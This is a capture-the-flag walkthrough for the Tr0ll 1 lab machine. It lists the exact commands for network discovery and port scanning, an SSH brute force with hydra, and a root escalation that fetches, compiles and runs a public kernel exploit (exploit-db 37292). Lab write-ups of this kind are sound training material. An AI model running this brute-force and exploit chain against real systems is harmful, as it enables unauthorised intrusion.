Hello, in this article I will show you step by step how to solve Tr0ll 1. The purpose of this CTF will be to become root and read /root/proof.txt. Click to get more information about CTF.
LEVEL : Easy
Steps
- Learning the target’s IP address with Netdiscover tool
- Detection of open ports with Nmap tool
- Collecting information via port 80 with Dirb tool
- Searching for text with strings in downloaded files
- Finding an available user with SSH Brute force using hydra tool
- Becoming root using Kernel Exploit
Based on the IP information of the Kali machine, the IP address used by the target machine was determined with the following command.
netdiscover -r 192.168.88.0/24
The detection of open ports on the target machine was done as follows.
nmap -A -Pn -n -sV --reason -p- 192.168.88.155
Fuzzing was performed via dirb on open port 80.
dirb http://192.168.88.155/
To obtain more information specifically for port 80, a tool called nikto was used.
nikto -C all 192.168.88.0/24
Using the information obtained, a connection was established to the target’s web server via the browser. Here, the previously determined root and secret paths were visited, photographs like the ones below were encountered, and then they were downloaded to the Kali machine to be checked.
During the port scanning process, it was learned that FTP Server was running on the target machine and that it could be connected anonymously. Here, this connection was made through the browser and the file named lol.pcap was downloaded.
The downloaded pcap file was checked with the string command to see if it contained a readable string. During this check, a keyword “sup3rs3cr3tdirlol” was detected and a note was taken for later.
strings lol.pcap
When the keyword determined in the previous stage was given as a path on port 80 and checked, a result as follows was obtained. The file named “roflmao” has been downloaded to the Kali machine to be checked.
The content of the file named “roflmao” was checked in a similar way with the strings command, and the hex value “0x0856BF” in the marked area in the picture was noted to be checked.
strings roflmao
Similarly, when the “0x0856BF” value detected in the previous stage was given as a path on port 80, the result was obtained as follows.
The contents of the detected folders have been downloaded to the Kali machine. When looking at the file names and contents, it is interpreted that SSH Brute Force can be performed using these files.
In the SSH Brute Force attack performed with Hydra, “overflow:Pass.txt” username and password information was detected.
hydra -L which_one_lo.txt -P Pass.txt 192.168.88.155
Some attempts were made on the Privilege Escalation side, but no results were obtained. The final step here is to download an exploit suitable for the kernel version of the target machine and become root. Below, this process is carried out step by step.
wget https://www.exploit-db.com/download/37292
mv 37292 37292.c
gcc 37292.c -o exploit
./exploit
The exploit worked on the machine and became rooted. In this case, both root is established and the file named /root/proof.txt is read.
Summary
- I solved and took enjoy but i think this CTF is like puzzle it’s not OSCP Style.
Click here to see my other articles about OSCP Walkthrough. Link
